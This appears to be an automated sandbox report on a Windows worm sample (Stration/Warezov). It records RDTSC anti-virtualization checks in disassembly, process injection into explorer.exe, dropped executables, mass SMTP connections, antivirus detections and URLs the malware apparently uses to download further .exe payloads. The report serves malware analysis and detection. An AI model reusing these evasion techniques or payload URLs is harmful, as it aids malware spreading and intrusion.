      Source: C:\Users\user\Desktop\file.msg.scr.exeRDTSC instruction interceptor: First address: 000000000040D1D0 second address: 000000000040D1DE instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+04h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [747817DCh] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F166CBE1B3Eh 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 shr edx, 18h 0x0000003c mov esp, ebp 0x0000003e pop ebp 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [esp+08h], eax 0x00000046 rdtsc
      Source: C:\Users\user\Desktop\file.msg.scr.exeRDTSC instruction interceptor: First address: 000000000040D1DE second address: 000000000040D1EC instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+08h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [747817DCh] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F166CC3E24Eh 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 shr edx, 18h 0x0000003c mov esp, ebp 0x0000003e pop ebp 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [esp+0Ch], eax 0x00000046 rdtsc
      Source: C:\Users\user\Desktop\file.msg.scr.exeRDTSC instruction interceptor: First address: 000000000040D1EC second address: 000000000040D1FA instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+0Ch], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [747817DCh] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F166CBE1B3Eh 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 shr edx, 18h 0x0000003c mov esp, ebp 0x0000003e pop ebp 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [esp+10h], eax 0x00000046 rdtsc
      Source: C:\Windows\serv.exeRDTSC instruction interceptor: First address: 000000000040D1D0 second address: 000000000040D1DE instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+04h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [747817DCh] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F166CC3E24Eh 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 shr edx, 18h 0x0000003c mov esp, ebp 0x0000003e pop ebp 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [esp+08h], eax 0x00000046 rdtsc
      Source: C:\Windows\serv.exeRDTSC instruction interceptor: First address: 000000000040D1DE second address: 000000000040D1EC instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+08h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [747817DCh] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F166CBE1B3Eh 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 shr edx, 18h 0x0000003c mov esp, ebp 0x0000003e pop ebp 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [esp+0Ch], eax 0x00000046 rdtsc
      Source: C:\Windows\serv.exeRDTSC instruction interceptor: First address: 000000000040D1EC second address: 000000000040D1FA instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+0Ch], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [747817DCh] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F166CC3E24Eh 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 shr edx, 18h 0x0000003c mov esp, ebp 0x0000003e pop ebp 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [esp+10h], eax 0x00000046 rdtsc
      Source: C:\Windows\serv.exeRDTSC instruction interceptor: First address: 000000000040D1D0 second address: 000000000040D1DE instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+04h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [747817DCh] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F166CBE1B3Eh 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 shr edx, 18h 0x0000003c mov esp, ebp 0x0000003e pop ebp 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [esp+08h], eax 0x00000046 rdtsc
      Source: C:\Windows\serv.exeRDTSC instruction interceptor: First address: 000000000040D1DE second address: 000000000040D1EC instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+08h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [747817DCh] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F166CC3E24Eh 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 shr edx, 18h 0x0000003c mov esp, ebp 0x0000003e pop ebp 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [esp+0Ch], eax 0x00000046 rdtsc
      Source: C:\Windows\serv.exeRDTSC instruction interceptor: First address: 000000000040D1EC second address: 000000000040D1FA instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+0Ch], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [747817DCh] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F166CBE1B3Eh 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 shr edx, 18h 0x0000003c mov esp, ebp 0x0000003e pop ebp 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov dword ptr [esp+10h], eax 0x00000046 rdtsc
      Source: C:\Windows\serv.exe TID: 3248Thread sleep time: -1200000s >= -30000sJump to behavior
      Source: C:\Windows\serv.exe TID: 3248Thread sleep time: -300000s >= -30000sJump to behavior
      Source: C:\Windows\serv.exe TID: 6312Thread sleep time: -1500000s >= -30000sJump to behavior
      Source: C:\Windows\serv.exe TID: 6312Thread sleep time: -300000s >= -30000sJump to behavior
      Source: C:\Windows\serv.exeDropped PE file which has not been started: C:\Windows\SysWOW64\e1.dllJump to dropped file
      Source: C:\Windows\serv.exeDropped PE file which has not been started: C:\Windows\SysWOW64\nwprmp4s.exeJump to dropped file
      Source: C:\Windows\serv.exeDropped PE file which has not been started: C:\Windows\SysWOW64\atmlmcia.dllJump to dropped file
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0040B470 GetLocalTime followed by cmp: cmp word ptr [esp+000000a6h], ax and CTI: jbe 0040B8ECh0_2_0040B470
      Source: C:\Windows\serv.exeCode function: 2_2_0040B470 GetLocalTime followed by cmp: cmp word ptr [esp+000000a6h], ax and CTI: jbe 0040B8ECh2_2_0040B470
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0040D1C0 rdtsc 0_2_0040D1C0
      Source: C:\Windows\serv.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\serv.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\serv.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\serv.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 808Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 789Jump to behavior
      Source: C:\Windows\serv.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-17917
      Source: C:\Users\user\Desktop\file.msg.scr.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17263
      Source: C:\Windows\serv.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00429AAE VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_00429AAE
      Source: C:\Windows\serv.exeCode function: 2_2_0041BF10 FindFirstFileA,FindFirstFileA,2_2_0041BF10
      Source: C:\Windows\serv.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\serv.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\serv.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\serv.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\serv.exeAPI call chain: ExitProcess graph end nodegraph_2-17716
      Source: serv.exe, 00000002.00000002.619386525.0000000003960000.00000004.00000020.00020000.00000000.sdmp, serv.exe, 00000005.00000002.632674724.00000000039C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j0VPxfzBfBRCCNCxQY+G18LPut61YEnGroLkFwV2l+2uW9zoLcpZoVQbA7ubv05ht51fghGFSY95
      Source: explorer.exe, 00000004.00000000.590359778.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
      Source: explorer.exe, 00000004.00000000.590359778.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000004.00000002.817185523.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
      Source: explorer.exe, 00000004.00000000.590359778.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: serv.exe, 00000005.00000002.632910417.0000000003B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FVod6AupIN+wL5mA0eLpKSVu5uNLKojhOjEY/AoxaOlRZnHgTyrYX4D9PlWlJmvQ2vmcID9mVYbo
      Source: explorer.exe, 00000004.00000003.804541404.000000000CDEC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
      Source: serv.exe, 00000002.00000002.619843375.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, serv.exe, 00000005.00000002.632674724.00000000039C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t51fghGFSY95FvQE0CpakBsxrc9hAQNL/xRPDsUTza1t2FWY59JmD2nD5vC8VK8eSKdIslASec8B
      Source: explorer.exe, 00000004.00000000.590359778.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
      Source: serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0041F2B0 LoadLibraryA,GetProcAddress,0_2_0041F2B0
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0041AC50 GetProcessHeap,0_2_0041AC50
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0040D1C0 rdtsc 0_2_0040D1C0
      Source: C:\Windows\serv.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\serv.exeSystem information queried: KernelDebuggerInformationJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00423F8A SetUnhandledExceptionFilter,0_2_00423F8A
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_00423F9E SetUnhandledExceptionFilter,0_2_00423F9E
      Source: C:\Windows\serv.exeCode function: 2_2_00423F8A SetUnhandledExceptionFilter,2_2_00423F8A
      Source: C:\Windows\serv.exeCode function: 2_2_00423F9E SetUnhandledExceptionFilter,2_2_00423F9E

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\notepad.exeInjected file: C:\Users\user\Desktop\19F3.tmp was created by C:\Users\user\Desktop\file.msg.scr.exeJump to behavior
      Source: C:\Windows\serv.exeMemory written: C:\Windows\explorer.exe base: 2A90000Jump to behavior
      Source: C:\Windows\serv.exeMemory allocated: C:\Windows\explorer.exe base: 2A90000 protect: page read and writeJump to behavior
      Source: C:\Windows\serv.exeMemory written: PID: 3528 base: 2A90000 value: 65Jump to behavior
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004215C0 AllocateAndInitializeSid,AllocateAndInitializeSid,AllocateAndInitializeSid,0_2_004215C0
      Source: explorer.exe, 00000004.00000002.810138099.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.578801665.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
      Source: explorer.exe, 00000004.00000002.835566370.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.676330356.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.590359778.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000004.00000002.810138099.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.578801665.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000004.00000000.578659152.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.809652496.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
      Source: explorer.exe, 00000004.00000002.810138099.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.578801665.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\serv.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\notepad.exeQueries volume information: C:\Users\user\Desktop\19F3.tmp VolumeInformationJump to behavior
      Source: C:\Windows\serv.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: GetLocaleInfoA,0_2_004298A2
      Source: C:\Windows\serv.exeCode function: GetLocaleInfoA,2_2_004298A2
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_004122F0 GetLocalTime,0_2_004122F0
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0040B470 GetLocalTime,GetTimeZoneInformation,0_2_0040B470
      Source: C:\Users\user\Desktop\file.msg.scr.exeCode function: 0_2_0041B250 GetVersionExA,0_2_0041B250
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Native API
      1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      121
      Masquerading
      1
      Input Capture
      12
      System Time Discovery
      Remote Services1
      Input Capture
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Shared Modules
      Boot or Logon Initialization Scripts42
      Process Injection
      41
      Virtualization/Sandbox Evasion
      LSASS Memory241
      Security Software Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      Exfiltration Over Bluetooth1
      Non-Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      Security Account Manager41
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
      Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)42
      Process Injection
      NTDS3
      Process Discovery
      Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common2
      Obfuscated Files or Information
      Cached Domain Credentials1
      Remote System Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      File and Directory Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
      System Information Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 877404 Sample: file.msg.scr.exe Startdate: 29/05/2023 Architecture: WINDOWS Score: 100 61 Antivirus detection for dropped file 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 65 Multi AV Scanner detection for dropped file 2->65 67 3 other signatures 2->67 9 file.msg.scr.exe 2 2->9         started        process3 file4 33 C:\Windows\serv.exe, PE32 9->33 dropped 35 C:\Users\user\Desktop\19F3.tmp, data 9->35 dropped 71 Tries to detect virtualization through RDTSC time measurements 9->71 13 serv.exe 1 19 9->13         started        18 notepad.exe 9->18         started        signatures5 process6 dnsIp7 55 mta7.am0.yahoodns.net 67.195.204.79, 25, 49694 YAHOO-3US United States 13->55 57 hotmail-com.olc.protection.outlook.com 104.47.18.161, 25, 49696, 49699 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->57 59 13 other IPs or domains 13->59 41 C:\Windows\serv.dll, PE32 13->41 dropped 43 C:\Windows\SysWOW64\nwprmp4s.exe, PE32 13->43 dropped 45 C:\Windows\SysWOW64\e1.dll, PE32 13->45 dropped 47 4 other malicious files 13->47 dropped 73 Antivirus detection for dropped file 13->73 75 Multi AV Scanner detection for dropped file 13->75 77 Creates an undocumented autostart registry key 13->77 81 5 other signatures 13->81 20 explorer.exe 6 2 13->20 injected 23 WerFault.exe 20 5 13->23         started        79 Injects files into Windows application 18->79 file8 signatures9 process10 signatures11 69 Drops executables to the windows directory (C:\Windows) and starts them 20->69 25 serv.exe 15 20->25         started        29 WerFault.exe 18 5 23->29         started        process12 dnsIp13 49 67.195.204.74, 25, 49697 YAHOO-3US United States 25->49 51 alt2.gmail-smtp-in.l.google.com 142.250.150.26, 25, 49698 GOOGLEUS United States 25->51 53 14 other IPs or domains 25->53 37 C:\Users\user\AppData\Local\Temp\~E5B8.tmp, Zip 25->37 dropped 39 C:\Users\user\AppData\Local\Temp\~E54A.tmp, Zip 25->39 dropped 31 WerFault.exe 5 25->31         started        file14 process15

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      file.msg.scr.exe86%ReversingLabsWin32.Worm.Stration
      file.msg.scr.exe83%VirustotalBrowse
      file.msg.scr.exe100%AviraWORM/Stration.C
      file.msg.scr.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Windows\SysWOW64\e1.dll100%AviraTR/Crypt.XPACK.Gen
      C:\Windows\SysWOW64\nwprmp4s.exe100%AviraTR/Crypt.XPACK.Gen
      C:\Windows\SysWOW64\blacusrv.dll100%AviraTR/PWS.Sinowal.Gen5
      C:\Windows\serv.exe100%AviraWORM/Stration.C
      C:\Windows\SysWOW64\atmlmcia.dll100%AviraWORM/Stration.Gen
      C:\Windows\serv.dll100%AviraTR/Crypt.XPACK.Gen
      C:\Users\user\AppData\Local\Temp\~E54A.tmp100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\~BD02.tmp100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\~E5B8.tmp100%Joe Sandbox ML
      C:\Windows\SysWOW64\nwprmp4s.exe100%Joe Sandbox ML
      C:\Windows\serv.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\~28C3.tmp100%Joe Sandbox ML
      C:\Windows\SysWOW64\atmlmcia.dll83%ReversingLabsWin32.Worm.Stration
      C:\Windows\SysWOW64\blacusrv.dll68%ReversingLabsWin32.Worm.Stration
      C:\Windows\SysWOW64\e1.dll76%ReversingLabsWin32.Worm.Stration
      C:\Windows\SysWOW64\nwprmp4s.exe78%ReversingLabsWin32.Worm.Warezov
      C:\Windows\serv.dll84%ReversingLabsWin32.Worm.Stration
      C:\Windows\serv.exe86%ReversingLabsWin32.Worm.Stration
      No Antivirus matches
      SourceDetectionScannerLabelLink
      mta6.am0.yahoodns.net0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
      http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
      http://www4.ertinmdesachlion.com/chr/tdg/lt.exe)0%Avira URL Cloudsafe
      http://www6.ertinmdesachlion.com/chr/tdg/nt.exeT0%Avira URL Cloudsafe
      http://www4.ertinmdesachlion.com/chr/tdg/lt.exe70%Avira URL Cloudsafe
      http://www4.ertinmdesachlion.com/chr/tdg/lt.exen0%Avira URL Cloudsafe
      http://www6.ertinmdesachlion.com/0%Avira URL Cloudsafe
      http://www4.ertinmdesa-k0%Avira URL Cloudsafe
      http://www4.ertinmdesachlion.com/chr/tdg/lt.exea0%Avira URL Cloudsafe
      http://www4.ertinmdesachlion.com/chr/tdg/lt.exeX0%Avira URL Cloudsafe
      http://www6.ertinmdesachlion.com/chr/tdg/nt.exe0%Avira URL Cloudsafe
      http://www4.ertinmdesachlion.com/chr/tdg/lt.exeg0%Avira URL Cloudsafe
      http://www4.ertinmdesachlion.com/chr/tdg/lt.exe0%Avira URL Cloudsafe
      http://www4.ertinmdesachlionY0%Avira URL Cloudsafe
      http://www6.ertinmdesachlion.com/r0%Avira URL Cloudsafe
      http://www4.ertinmdesachlion.com/chr/tdg/lt.exe=0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      mta6.am0.yahoodns.net
      67.195.228.106
      truefalseunknown
      alt4.gmail-smtp-in.l.google.com
      142.250.157.27
      truefalse
        high
        alt3.gmail-smtp-in.l.google.com
        74.125.200.27
        truefalse
          high
          mta7.am0.yahoodns.net
          67.195.204.79
          truefalse
            unknown
            gmail-smtp-in.l.google.com
            142.250.27.26
            truefalse
              high
              mta5.am0.yahoodns.net
              67.195.228.110
              truefalse
                unknown
                alt1.gmail-smtp-in.l.google.com
                142.251.9.27
                truefalse
                  high
                  alt2.gmail-smtp-in.l.google.com
                  142.250.150.26
                  truefalse
                    high
                    hotmail-com.olc.protection.outlook.com
                    104.47.18.161
                    truefalse
                      high
                      hotmail.com
                      unknown
                      unknownfalse
                        high
                        www4.ertinmdesachlion.com
                        unknown
                        unknownfalse
                          unknown
                          gmail.com
                          unknown
                          unknownfalse
                            high
                            www6.ertinmdesachlion.com
                            unknown
                            unknownfalse
                              unknown
                              www3.ertinmdesachlion.com
                              unknown
                              unknownfalse
                                unknown
                                yahoo.com
                                unknown
                                unknownfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www4.ertinmdesachlion.com/chr/tdg/lt.exe)serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www4.ertinmdesachlion.com/chr/tdg/lt.exegserv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www4.ertinmdesa-kserv.exe, 00000002.00000003.602430085.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, serv.exe, 00000002.00000002.614445263.00000000006C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www6.ertinmdesachlion.com/chr/tdg/nt.exeTserv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000004.00000000.599025218.00007FF883839000.00000002.00000001.01000000.0000000B.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www4.ertinmdesachlion.com/chr/tdg/lt.exenserv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www6.ertinmdesachlion.com/serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmp, serv.exe, 00000005.00000002.631240133.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000004.00000000.599025218.00007FF883839000.00000002.00000001.01000000.0000000B.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www4.ertinmdesachlion.com/chr/tdg/lt.exeXserv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www4.ertinmdesachlion.com/chr/tdg/lt.exe7serv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www6.ertinmdesachlion.com/chr/tdg/nt.exeserv.exe, 00000002.00000002.614445263.0000000000636000.00000004.00000020.00020000.00000000.sdmp, serv.exe, 00000005.00000002.631240133.00000000006BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
